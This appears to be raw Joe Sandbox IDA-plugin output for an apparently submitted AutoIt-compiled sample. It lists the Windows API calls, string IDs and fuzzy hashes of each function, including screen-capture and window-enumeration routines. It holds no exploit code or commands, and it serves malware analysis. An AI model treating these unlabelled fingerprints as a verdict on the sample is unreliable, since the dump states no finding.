                      • API String ID: 1458621304-248962490
                      • Opcode ID: df8829e052d7c40840cee99ca6260df0de385842cec2d42fdc9bfdfb12db4f5c
                      • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                      • Opcode Fuzzy Hash: df8829e052d7c40840cee99ca6260df0de385842cec2d42fdc9bfdfb12db4f5c
                      • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                      • __swprintf.LIBCMT ref: 0045A51B
                      • _wcscmp.LIBCMT ref: 0045A52E
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                      • _wcscmp.LIBCMT ref: 0045A5BF
                      • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                      • GetDlgCtrlID.USER32(?), ref: 0045A648
                      • GetWindowRect.USER32(?,?), ref: 0045A67E
                      • GetParent.USER32(?), ref: 0045A69C
                      • ScreenToClient.USER32(00000000), ref: 0045A6A3
                      • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                      • _wcscmp.LIBCMT ref: 0045A731
                      • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                      • _wcscmp.LIBCMT ref: 0045A76B
                        • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                      • String ID: %s%u
                      • API String ID: 3744389584-679674701
                      • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                      • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                      • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                      • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                      APIs
                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                      • _wcscmp.LIBCMT ref: 0045AF29
                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                      • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                      • _wcscmp.LIBCMT ref: 0045AF8C
                      • _wcsstr.LIBCMT ref: 0045AF9D
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                      • _wcscmp.LIBCMT ref: 0045AFE5
                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                      • _wcscmp.LIBCMT ref: 0045B065
                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                      • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                      • String ID: @$ThumbnailClass
                      • API String ID: 1788623398-1539354611
                      • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                      • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                      • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                      • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                        • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                        • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                        • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                      • _wcscat.LIBCMT ref: 0048C6EE
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                      • DragFinish.SHELL32(?), ref: 0048C75E
                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                      • API String ID: 169749273-3863044002
                      • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                      • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                      • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                      • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                      • API String ID: 1038674560-1810252412
                      • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                      • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                      • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                      • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                      APIs
                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                      • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                      • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                      • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                      • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                      • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                      • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                      • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                      • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                      • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                      • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                      • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                      • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                      • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                      • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                      • GetCursorInfo.USER32(?), ref: 004750C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Cursor$Load$Info
                      • String ID:
                      • API String ID: 2577412497-0
                      • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                      • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                      • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                      • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                      APIs
                      • _memset.LIBCMT ref: 0048A259
                      • DestroyWindow.USER32(?,?), ref: 0048A2D3
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                      • DestroyWindow.USER32(00000000), ref: 0048A3A4
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                      • GetDesktopWindow.USER32 ref: 0048A40D
                      • GetWindowRect.USER32(00000000), ref: 0048A414
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                        • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                      • String ID: 0$tooltips_class32
                      • API String ID: 1297703922-3619404913
                      • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                      • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                      • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                      • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00484424
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                      • API String ID: 3974292440-4258414348
                      • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                      • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                      • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                      • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                      APIs
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                      • GetDriveTypeW.KERNEL32 ref: 0046A418
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                      • API String ID: 2698844021-4113822522
                      • Opcode ID: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                      • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                      • Opcode Fuzzy Hash: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                      • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                      • GetFocus.USER32 ref: 0048C20C
                      • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                      • _memset.LIBCMT ref: 0048C342
                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                      • GetMenuItemCount.USER32(?), ref: 0048C38D
                      • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                      • String ID: 0
                      • API String ID: 1296962147-4108050209
                      • Opcode ID: bd24d1798a429d48612d4fb07f1efb563176f6f0fa598044465ce7e723a2363a
                      • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                      • Opcode Fuzzy Hash: bd24d1798a429d48612d4fb07f1efb563176f6f0fa598044465ce7e723a2363a
                      • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                      APIs
                      • GetDC.USER32(00000000), ref: 0047738F
                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                      • CreateCompatibleDC.GDI32(?), ref: 004773A7
                      • SelectObject.GDI32(00000000,?), ref: 004773B4
                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                      • SelectObject.GDI32(00000006,?), ref: 00477470
                      • DeleteObject.GDI32(?), ref: 00477479
                      • DeleteDC.GDI32(00000006), ref: 00477480
                      • ReleaseDC.USER32(00000000,?), ref: 0047748B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                      • String ID: (
                      • API String ID: 2598888154-3887548279
                      • Opcode ID: 1df89f8f9c1f54aae833a9d5101421b859ac3cca0f9286444877ec68b0466c1f
                      • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                      • Opcode Fuzzy Hash: 1df89f8f9c1f54aae833a9d5101421b859ac3cca0f9286444877ec68b0466c1f
                      • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                      APIs
                        • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                        • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                        • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                        • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                      • API String ID: 537147316-1018226102
                      • Opcode ID: f2279d342799b2d8ac053d02583c029e5605faf8829a82c443068f2cc29d005e
                      • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                      • Opcode Fuzzy Hash: f2279d342799b2d8ac053d02583c029e5605faf8829a82c443068f2cc29d005e
                      • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                      APIs
                      • _memset.LIBCMT ref: 00462D50
                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                      • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                      • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                      • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                      • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                      • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                      • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                      • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                      • GetCursorPos.USER32(?), ref: 00462F56
                      • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                      • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                      • String ID:
                      • API String ID: 3993528054-0
                      • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                      • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                      • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                      • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 02F92543
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93090
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930A2
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930B4
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930C6
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930D8
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930EA
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930FC
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F9310E
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93120
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93132
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93144
